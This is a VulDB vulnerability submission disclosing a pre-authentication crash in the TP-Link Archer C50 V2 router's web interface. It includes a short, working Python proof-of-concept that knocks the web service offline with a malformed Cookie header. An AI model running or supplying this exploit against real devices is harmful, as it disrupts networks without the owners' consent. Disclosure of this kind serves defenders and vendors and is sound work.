提出 #89806: Web crash found on TP-LINK router(Archer C50(US)_V2_160801)情報

タイトル	Web crash found on TP-LINK router(Archer C50(US)_V2_160801)
説明	# Web crash found on TP-LINK router(Archer C50(US)_V2_160801) ## Overview of the Vulnerability This vulnerability exists in the router version of TPLINK Archer C50v2(Firmware version:Archer C50(US)_V2_160801，downloadlink:https://www.tp-link.com/us/support/download/archer-c50/v2/#Firmware). The corresponding vulnerability happen at parsing cookie field of http request packet. The router goes crash after parsing a malformed cookie. Obviously the vulnerability happens before authentication, so it's easy to attack the router without knowing password of the web service. Only just one malformed request can disable the router function well and have potential to control over the router. ## Business Impact The implementation of the vulnerablity is very simple and can result in indirect financial loss for the business. These malicious acts may also cause damage to the business reputation by affecting the trust of customers. ## Steps to Reproduce I have attached the reproduced Poc code below. You only need to modify the web IP address of the target device to exploit the vulnerability and crash the program. ## Proof of Concept (POC) After executing the POC script, then trying to visit the router web management interface(or 'telnet device_web_ip 80'), you will find web service goes down. ```python import requests import time device_web_ip = '192.168.0.1' request = {'HEAD' : {'Host' : '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Cookie' : 'Authorization', 'Upgrade-Insecure-Requests' : '1', 'Cache-Control' : 'max-age=0' }, 'ATTR': {'URL': 'http://{}/'.format(device_web_ip), 'METHOD': 'GET', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5) except: pass ```
ユーザー	a2ure (UID 41072)
送信	2023年02月16日 08:22 (3 年 ago)
モデレーション	2023年02月21日 10:23 (5 days later)
ステータス	承諾済み
VulDBエントリ	221552 [TP-Link Archer C50 V2_160801 Web Management Interface サービス拒否]
ポイント	17

◂ 前概要次 ▸

Do you know our Splunk app?

Download it now for free!